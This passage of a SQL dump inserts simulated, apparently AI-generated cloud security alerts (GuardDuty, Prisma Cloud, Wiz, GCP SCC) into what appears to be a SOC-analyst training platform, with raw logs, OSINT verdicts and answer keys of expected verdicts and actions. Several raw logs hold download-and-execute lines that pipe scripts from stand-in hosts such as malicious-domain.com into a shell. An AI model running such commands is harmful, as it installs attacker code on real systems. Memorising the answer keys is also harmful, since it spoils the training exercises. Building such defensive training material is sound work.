(1985, 'GCP Service Account Hijacking Attempt', 'critical', 'GCP SCC', 'Suspicious activity detected involving a GCP service account attempting to access unauthorized resources.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:15:43Z\",\"event_type\":\"login_attempt\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"35.196.90.23\",\"username\":\"compromised_service_account\",\"hostname\":\"gcp.google.com\",\"command_line\":\"gcloud auth activate-service-account --key-file /path/to/key.json\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous credential stuffing attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_service_account\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Service account within the organization\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"gcloud auth activate-service-account --key-file /path/to/key.json\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected unauthorized service account activation\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The attempt to hijack a service account with unauthorized access confirms this as a true positive credential attack.\"}', 'Intermediate', 'CLOUD', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1986, 'Prisma Cloud Detected Unauthorized Kubernetes Access', 'high', 'Prisma Cloud', 'Unauthorized access to Kubernetes cluster detected from external IP address. Potential risk of container compromise.', 'Lateral Movement', 'T1570', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:00:05Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.0.2.56\",\"dst_ip\":\"10.0.1.20\",\"username\":\"kube_admin\",\"hostname\":\"kubernetes.local\",\"command_line\":\"kubectl get pods --all-namespaces\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP flagged for suspicious Kubernetes access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Kubernetes cluster internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"kubectl get pods --all-namespaces\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected unauthorized Kubernetes command execution\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Unauthorized command execution on Kubernetes cluster indicates a potential lateral movement attempt, confirming a true positive.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1987, 'Wiz Detected Serverless Function Misuse', 'medium', 'Wiz', 'Suspicious execution of serverless function detected, possibly indicating misuse for unauthorized data processing.', 'Execution', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:22:19Z\",\"event_type\":\"process_execution\",\"src_ip\":\"198.51.100.78\",\"dst_ip\":\"10.0.2.30\",\"username\":\"lambda_user\",\"hostname\":\"aws.lambda.com\",\"command_line\":\"node malicious_script.js\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.78\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous unauthorized script executions\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"node malicious_script.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected execution of a known malicious script\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.2.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of serverless function\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"The execution of a known malicious script on a serverless function indicates potential misuse, confirming a true positive.\"}', 'Intermediate', 'CLOUD', 5, 1, 'RETAIL', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1988, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'Suspicious activity detected on an S3 bucket. Data exfiltration attempt using compromised credentials.', 'Data Exfil', 'T1537', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:45:00Z\",\"event_type\":\"data_access\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"compromised_user\",\"hostname\":\"aws-s3-bucket\",\"request_body\":\"GET /sensitive-data/\",\"command_line\":\"aws s3 cp s3://sensitive-data /local/ --recursive\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 120 times for data exfiltration attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Username associated with multiple unauthorized access attempts\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"aws s3 cp s3://sensitive-data /local/ --recursive\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used in unauthorized data transfers\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The use of compromised credentials and a known malicious IP confirms the data exfiltration attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1989, 'Azure IAM Privilege Escalation Detected', 'high', 'Azure Defender', 'Detected unauthorized increase in IAM permissions for a user account.', 'Privilege Escalation', 'T1068', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:00Z\",\"event_type\":\"user_privilege_change\",\"src_ip\":\"198.51.100.55\",\"dst_ip\":\"10.0.0.5\",\"username\":\"elevated_user\",\"hostname\":\"azure-ad\",\"request_body\":\"RoleAssignment\",\"command_line\":\"az role assignment create --assignee elevated_user --role Contributor\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP known for suspicious login attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"elevated_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Account previously not used for administrative tasks\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"az role assignment create --assignee elevated_user --role Contributor\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Command used in privilege escalation incidents\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The unauthorized role assignment indicates a successful privilege escalation attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1990, 'GCP Service Account Hijacking Detected', 'critical', 'GCP SCC', 'A service account was used to perform activities outside its regular scope, indicating potential hijacking.', 'Credential Access', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:15:00Z\",\"event_type\":\"service_account_use\",\"src_ip\":\"203.0.113.99\",\"dst_ip\":\"192.168.2.15\",\"username\":\"service-account-123\",\"hostname\":\"gcp-project\",\"request_body\":\"Accessing restricted resources\",\"command_line\":\"gcloud compute instances list --filter=\'name~\'restricted-instance\'\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous hijacking incidents\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service-account-123\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Service account used outside regular patterns\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"gcloud compute instances list --filter=\'name~\'restricted-instance\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command indicative of unauthorized resource access\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The unauthorized activities performed by the service account indicate hijacking.\"}', 'Intermediate', 'CLOUD', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1991, 'Prisma Cloud Serverless Function Anomaly', 'high', 'Prisma Cloud', 'Anomalous execution detected in a serverless function. Possible code injection or misuse.', 'Execution', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:00:00Z\",\"event_type\":\"function_execution\",\"src_ip\":\"203.0.113.200\",\"dst_ip\":\"10.0.1.1\",\"username\":\"lambda_function\",\"hostname\":\"prisma-cloud\",\"request_body\":\"Execution of unauthorized script\",\"command_line\":\"node -e \\\"require(\'child_process\').exec(\'wget http://malicious-site.com/payload\');\\\"\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP known for distributing malware\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"node -e \\\"require(\'child_process\').exec(\'wget http://malicious-site.com/payload\');\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command execution indicative of code injection\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of a script to download a payload confirms a code injection attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1992, 'Wiz Kubernetes Unauthorized Access Attempt', 'medium', 'Wiz', 'Detected an unauthorized access attempt to a Kubernetes cluster. Possible exploitation of misconfigured controls.', 'Lateral Movement', 'T1021', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:25:00Z\",\"event_type\":\"cluster_access\",\"src_ip\":\"198.51.100.88\",\"dst_ip\":\"172.16.0.2\",\"username\":\"k8s_admin\",\"hostname\":\"wiz-k8s-cluster\",\"request_body\":\"kubectl get pods\",\"command_line\":\"kubectl exec --stdin --tty pod_name -- /bin/bash\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP involved in unauthorized Kubernetes access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"kubectl exec --stdin --tty pod_name -- /bin/bash\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Command used in lateral movement attempts within clusters\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The unauthorized kubectl command execution suggests an attempt to move laterally within the cluster.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1993, 'AWS GuardDuty: S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'Unauthorized access to an S3 bucket was detected from an external IP address. Sensitive data exfiltration is suspected.', 'Data Exfil', 'T1537', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:45:00Z\",\"event_type\":\"s3_access\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.15\",\"username\":\"aws_user123\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive-data/file.txt HTTP/1.1\",\"command_line\":\"\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1023 times for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal address of victim machine\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"aws_user123\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"suspicious\",\"details\":\"User account involved in multiple unauthorized access events\"}},{\"id\":\"artifact_4\",\"type\":\"payload\",\"value\":\"GET /sensitive-data/file.txt HTTP/1.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Data exfiltration attempt via unauthorized S3 bucket access\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The alert is confirmed as true positive due to unauthorized access and data retrieval from an external IP.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1994, 'Azure Defender: IAM Privilege Escalation Attempt', 'high', 'Azure Defender', 'Potential privilege escalation detected where a user attempted to assign higher privileges using a compromised account.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:22:00Z\",\"event_type\":\"privilege_escalation\",\"src_ip\":\"203.0.113.50\",\"dst_ip\":\"10.0.0.5\",\"username\":\"compromised_user\",\"hostname\":\"azure.portal.com\",\"request_body\":\"POST /api/assignRole HTTP/1.1\",\"command_line\":\"\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP involved in several privilege escalation attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal address of victim Azure instance\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"suspicious\",\"details\":\"User account flagged for anomalous activity\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Confirmed privilege escalation attempt due to unauthorized role assignment from a known malicious IP.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1995, 'GCP SCC: Service Account Hijacking Detected', 'critical', 'GCP SCC', 'A GCP service account was compromised, leading to unauthorized API calls and potential data theft.', 'Credential Attack', 'T1550', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:30:00Z\",\"event_type\":\"api_call\",\"src_ip\":\"192.0.2.75\",\"dst_ip\":\"10.1.1.10\",\"username\":\"service_account_1\",\"hostname\":\"gcp.googleapis.com\",\"request_body\":\"POST /v1/projects/myproject/apis HTTP/1.1\",\"command_line\":\"\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous service account hijacking incidents\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal address of affected GCP instance\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"service_account_1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Service account involved in unauthorized API calls\"}}],\"expected_actions\":[\"reset_credentials\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"True positive due to unauthorized API access from a known malicious IP using a compromised service account.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1996, 'Prisma Cloud: Kubernetes Cluster Compromise', 'high', 'Prisma Cloud', 'Suspicious shell commands executed on a Kubernetes node indicating potential compromise.', 'Lateral Movement', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:50:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"172.20.10.5\",\"dst_ip\":\"\",\"username\":\"kube_user\",\"hostname\":\"k8s-node-1\",\"request_body\":\"\",\"command_line\":\"curl -s http://malicious-domain.com/payload.sh | bash\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"172.20.10.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal Kubernetes node IP\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"curl -s http://malicious-domain.com/payload.sh | bash\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command attempting to download and execute a malicious script\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"True positive due to execution of a known malicious command on a Kubernetes node.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1997, 'Wiz: Unauthorized Serverless Function Execution', 'medium', 'Wiz', 'An unauthorized execution of a serverless function was detected, potentially leading to data exposure.', 'Execution', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:15:00Z\",\"event_type\":\"function_execution\",\"src_ip\":\"203.0.113.99\",\"dst_ip\":\"\",\"username\":\"lambda_user\",\"hostname\":\"aws.lambda.com\",\"request_body\":\"\",\"command_line\":\"node handler.js\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for unauthorized AWS Lambda executions\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"node handler.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Execution of a potentially unauthorized serverless script\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"True positive due to unauthorized execution of a serverless function from a known malicious IP.\"}', 'Intermediate', 'CLOUD', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1998, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'An unauthorized access to an S3 bucket was detected originating from an external IP address. Sensitive data may have been exfiltrated.', 'Data Exfil', 'T1537', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T22:34:12Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"unauthorized_user\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive-data.zip HTTP/1.1\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"unauthorized_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Username used in previous unauthorized access attempts\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"GET /sensitive-data.zip HTTP/1.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Suspicious download attempt from S3 bucket\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP was involved in unauthorized access, matching OSINT findings for malicious activity.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1999, 'Azure IAM Privilege Escalation Attempt', 'high', 'Azure Defender', 'An internal account attempted to gain higher privileges using a compromised token, indicating possible credential theft.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T18:46:52Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.10\",\"username\":\"jdoe\",\"hostname\":\"azurevm01\",\"command_line\":\"az role assignment create --assignee jdoe --role contributor\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"User associated with suspicious privilege escalation attempts\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"az role assignment create --assignee jdoe --role contributor\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used in unauthorized privilege escalation attempts\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The command attempted by the internal user is consistent with privilege escalation behavior.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2000, 'GCP Service Account Hijacking Detected', 'critical', 'GCP SCC', 'Anomalous activity detected from a service account, indicating possible hijacking with unauthorized API calls.', 'Lateral Movement', 'T1098', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:08:23Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.15\",\"username\":\"svc-account\",\"hostname\":\"gcp-project-1\",\"request_body\":\"POST /v1/projects/service-accounts:signJwt\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple unauthorized API access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"svc-account\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Service account used in unauthorized actions\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"POST /v1/projects/service-accounts:signJwt\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Unauthorized JWT signing request detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The unauthorized API call is a clear indication of service account hijacking.\"}', 'Intermediate', 'CLOUD', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2001, 'Prisma Cloud Kubernetes Pod Compromise', 'high', 'Prisma Cloud', 'Anomalous process execution detected within a Kubernetes pod, indicating possible compromise and lateral movement.', 'Lateral Movement', 'T1570', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:11:09Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.1.2.3\",\"dst_ip\":\"10.1.2.4\",\"username\":\"kube-system\",\"hostname\":\"kube-pod-01\",\"command_line\":\"curl http://malicious-site.com/malware.sh | sh\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.2.3\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"curl http://malicious-site.com/malware.sh | sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command execution indicative of malicious activity\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-site.com/malware.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosting malicious scripts\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The command executed within the pod is consistent with compromise attempt patterns.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2002, 'Wiz Serverless Function Abnormal Invocation', 'medium', 'Wiz', 'A serverless function was triggered by an unexpected source IP, suggesting possible unauthorized access.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:33Z\",\"event_type\":\"process_execution\",\"src_ip\":\"172.16.0.2\",\"dst_ip\":\"172.16.0.3\",\"username\":\"lambda-function\",\"hostname\":\"aws-lambda-01\",\"command_line\":\"python3 handler.py invoke\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"172.16.0.2\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"python3 handler.py invoke\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual invocation of serverless function\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"lambda-function\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Lambda function invoked under suspicious circumstances\"}}],\"expected_actions\":[\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The unexpected source of function invocation aligns with unauthorized access patterns.\"}', 'Intermediate', 'CLOUD', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
